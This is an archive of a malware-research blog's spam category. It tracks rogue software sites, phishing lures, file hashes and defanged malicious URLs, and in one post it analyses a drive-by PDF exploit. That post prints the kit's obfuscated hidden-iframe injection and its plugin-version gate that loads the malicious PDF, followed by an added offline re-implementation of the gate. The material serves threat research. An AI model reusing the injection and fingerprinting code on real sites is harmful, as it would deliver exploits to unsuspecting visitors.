Archive for the 'MalSpam' Category

02
Jun

New rogue domain: hidef-porn-movies.com

Another domain has been found distributing fake-codec malware and rogue anti-malware programs. The referrer in this case was y0utybe.com.

Whois entry for hidef-porn-movies.com 91.212.132.11
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note – All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676


/promo1/ – Fake Adult-Archive.net page
/promo2/ – Fake PornTube page
/promo3/ – Fake scan page
/promo4/ – Fake SexTube page

Whois entry for y0utybe.com 216.195.60.231
Whois Privacy Protection Service
Whois Agent suqkgszqlv@whoisservices.cn
+86.05922577888 fax: +86.05922577111
Xiamen Software Park shengshi Building
xiamen fujian 361005
china

softname.exe
Result: 16/40 (40%)
MD5: aa33e33a6d0a650958c3fa0d1333d9f3
VirusTotal
ThreatExpert Analysis
hxxp://hidef-porn-movies.com/promo2/get.php?aid=1226&vname=softname

19
Nov

Fake Activation and Mailing List Unsubscribe Websites

In the past few days I’ve seen many websites pop up pretending to be mailing list unsubscription sites. And per usual, these sites feature legit-sounding names like antivirus-activation-code1.org or online-activation-code.info.

[Example screenshot: fake unsubscribe page]

STAY AWAY from these because in reality they are being used to collect email addresses, likely for future SPAM campaigns. I also suspect these domains are part of a current fake XP activation SPAM campaign.

Domains involved:


IPs associated with these:
66.79.162.82
67.209.140.130

antivirus-activation–code2.org
91.199.50.101

BE ADVISED: These sites may still be active, be careful!

–mwdisector

25
Sep

SpamNuker

Note: This site is distributing a rogue ("fake") anti-spam product that is itself malware. Do not visit the site, pay for, or download the software discussed below.


Site: hxxp://spamnuker.com/

File: OutlookSpamNukerInstaller.exe
VirusTotal: Result 14/36 (38.89%)

File size: 29280 bytes
MD5…: 463de2ba97b8effef4b72430de51553b
SHA1..: 1eb9f02c925ef27c5e6a1086cb0c6c798c208eaf
SHA256: 7700a3c6a95ed1bb2dfb21567818c7bce55a5d178b28cc9040c528d7045f72eb
SHA512: b52f87db3390ecd2cd5726c3833c07a224d9c718cc8d4a421faef5f66d3f3a2625d1a92c7bf288f67e4fba9f1fd63c40fd05b76ea85b149d6019a6a17e428bce
PEiD..: -
TrID..: File type identification
Windows Screen Saver (39.4%)
Win32 Executable Generic (25.6%)
Win32 Dynamic Link Library (generic) (22.8%)
Generic Win/DOS Executable (6.0%)
DOS Executable Generic (6.0%)

16
Sep

Virus Response Lab 2009

Note: This site is distributing a rogue ("fake") anti-malware product that is itself malware. Do not visit the site, pay for, or download the software discussed below.


Site: hxxp://viruslabs2009.com/

File: virlab_install.exe
VirusTotal: Result: 9/36 (25%)
File size: 1579973 bytes
MD5…: 93fef280425ad6fb002430abb8cf216d
SHA1..: 766a414faa1e062c0ce40f1ede93a3d166902b6c
SHA256: 4346309f29aacf14cd0fc764ccac674572a498b7f80e1a4018265008cbf1ba4c
SHA512: 371d231b30c32756be1dbd5b50e26144d506abe895a6893fdcea866b8353e3108548ded05366e25c2d968dffa506880e8729b7b8a6b4f4e06c3814d903eba37e
PEiD..: -
TrID..: File type identification
Win64 Executable Generic (59.6%)
Win32 Executable MS Visual C++ (generic) (26.2%)
Win32 Executable Generic (5.9%)
Win32 Dynamic Link Library (generic) (5.2%)
Generic Win/DOS Executable (1.3%)

MDB: /stingner-malware/

Removal:

Remove this threat with Malwarebytes!

07
Sep

Malspam: Notices from IRS (taxform_for_print.scr)

Here is a piece of malspam we received that purports to be from the IRS and tells you that you are due a refund. The one we got was from taxinform32@taxreducers.com. Simply follow the steps below and the money is yours! (Proceed at your own risk. File available in /pnuemo-malware/.)

Get Your Refund $1927.10 in Just 3 Easy Steps:
1. Print and fill a short tax interview (click to download)
2. Send it online
3. Receive your tax refund

The link included takes you to the following address and file: hxxp://freepromo.cn/documents/taxform_for_print.scr

taxform_for_print.scr
Result: 7/36 (19.45%)
MD5: a705a1df1fc36f696f0eb0fea72870d3
VirusTotal
ThreatExpert Analysis

31
Aug

Adobe Acrobat Reader PDF Exploit (gnu.pdf & us.pdf) (UPDATED)

This morning we found a website that automatically loads a malicious PDF file.

When the user is directed to the infected site, a hidden iframe loads the PDF file. Here is what happens.

Links still live, proceed at your own risk.

The user visits hxxp://120.50.46.90/~admin/tps/index.php, and the page includes the following obfuscated code:

<script language="javascript">document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%39%2E%34%36%2E%32%37%2E%34%31%2F%61%66%78%76%2F%74%70%76%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));</script>

When deobfuscated, it reads:

<iframe src="http://69.46.27.41/afxv/tpv/index.php" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

That is the hidden iframe. The page it loads includes the following code, which reads the Adobe Reader and Flash versions out of navigator.plugins and writes a second iframe for the PDF only when the Reader version is below 7.1:

<script>
ppdf=0;
i=0;
// Walk navigator.plugins and pull version strings out of the plugin descriptions
for(;navigator.plugins[i];i++)
{
// Matches "Adobe Acrobat Plug-In ..." descriptions and captures the Reader version
re=/.d.{2}e.A.{2}o.....l..-.+?([0-9]+.[0-9]+)/;
if(res=re.exec(navigator.plugins[i].description))
{
ppdf=res[1];
}
// Matches "Shockwave Flash x.y rzzz" descriptions and captures the Flash version
var re=/.h.{5}v.+?s.\s([0-9])\S([0-9]).+?([0-9]{1,5})/;
var res;
if(res=re.exec(navigator.plugins[i].description))
{
flash=res[1]+'.'+res[2]+'.'+res[3];
}
}
ppdfenable=0;
if(ppdf!=0)
{
ppdfenable=0;
ppdf=ppdf.replace(/\D/g,"");
// Only Reader 7.0.x or anything older than 7 gets the PDF
if(ppdf[0]==7 && ppdf[1]<1)ppdfenable=1;
if(ppdf[0]<7)ppdfenable=1;if(ppdfenable)
{
document.write('<iframe width=1 height=1 src="hxxp://69.46.27.41/afxv/tpv/gnu.pdf"></iframe>');
}
}
</script>
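To check which browser profiles this gate actually fires on, here is an added example (not code from the original post) that runs the kit's two regexes, copied unchanged from the script above, over constructed navigator.plugins description strings; the description formats are assumptions based on what the patterns were evidently written to match.

```javascript
// Added example, not code from the original post: evaluate the kit's plugin
// gate offline so an analyst can see which Reader versions would be sent to
// gnu.pdf without loading the page in a browser.

// The kit's regexes, unchanged. Assumption: Reader descriptions look like
// "Adobe Acrobat Plug-In Version 7.0 for Netscape" and Flash like
// "Shockwave Flash 9.0 r124", the formats these patterns were written for.
const READER_RE = /.d.{2}e.A.{2}o.....l..-.+?([0-9]+.[0-9]+)/;
const FLASH_RE = /.h.{5}v.+?s.\s([0-9])\S([0-9]).+?([0-9]{1,5})/;

// Re-implementation of the gate: returns what the kit would have concluded.
function fingerprint(descriptions) {
  let ppdf = 0;       // Reader version string, 0 if no Reader plugin seen
  let flash = null;   // Flash version as "major.minor.build"
  for (const d of descriptions) {
    let m = READER_RE.exec(d);
    if (m) ppdf = m[1];
    m = FLASH_RE.exec(d);
    if (m) flash = m[1] + '.' + m[2] + '.' + m[3];
  }
  let wouldLoadPdf = false;
  if (ppdf !== 0) {
    const digits = ppdf.replace(/\D/g, '');   // "7.0" -> "70"
    // The kit only fires for Reader 7.0.x and anything older than 7
    if (digits[0] == 7 && digits[1] < 1) wouldLoadPdf = true;
    if (digits[0] < 7) wouldLoadPdf = true;
  }
  return { reader: ppdf || null, flash, wouldLoadPdf };
}

// Constructed plugin descriptions for a few browser profiles. Note that the
// Flash regex expects a single-digit major version, so "Shockwave Flash 10.0"
// is never matched and the kit records no Flash version for it.
const PROFILES = {
  oldReaderOldFlash: ['Adobe Acrobat Plug-In Version 7.0 for Netscape', 'Shockwave Flash 9.0 r124'],
  patchedReader: ['Adobe Acrobat Plug-In Version 7.1 for Netscape', 'Shockwave Flash 10.0 r32'],
  veryOldReader: ['Adobe Acrobat Plug-In Version 6.0 for Netscape'],
  noReader: ['QuickTime Plug-in 7.6'],
};
```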

This leads us to the PDF in question at hxxp://69.46.27.41/afxv/tpv/gnu.pdf. Here is additional information regarding this file, which is also available in /pnuemo-malware/.

gnu.pdf
Result: 6/35 (17.15%)
MD5: 213d20a0523b6ea6c93d4348a509c34c
VirusTotal

Update your software!

UPDATED 9/1 12p PST

us.pdf
Result: 10/36 (27.78%)
MD5: 8175212481f069a6dd54de9cbd044039
VirusTotal
hxxp://174.133.121.165/us.pdf
hxxp://88.85.95.134/us.pdf

27
Aug

YouTube Message Malspam

I received this in my inbox today: a notice from YouTube that someone had sent me a message. The URL in the message takes the user through two redirects and then prompts the user to download a file. This file is malware and currently has a low detection rate. Here is the information I’ve gathered. All of the URLs below are still live, so proceed at your own risk.


hxxp://zz.gd/1d7d6a
-> hxxp://sghghdfgh.actionpooses.com/dfhgfhgfh
–> hxxp://actionpooses.com/livenow/live-now.htm
—> hxxp://212.179.35.9/Free-Girls-Cams-Viewer.exe

Free-Girls-Cams-Viewer.exe
Result: 6/36 (16.67%)
MD5: 716adbf47c6fffbd77604be9e9dd7043
VirusTotal
ThreatExpert Analysis

19
Aug

Britney Spears MalSpam points to mov.exe

We saw a new MalSpam today. Unfortunately, it shows a very nasty picture of Britney Spears getting out of Paris Hilton’s car. It forwards us to hxxp://www.lenapiel.com/mov.exe, which does not appear to be up at the time of our post.

Warning: The BSD daemon may not appear in the malspam you receive. You have been forewarned.
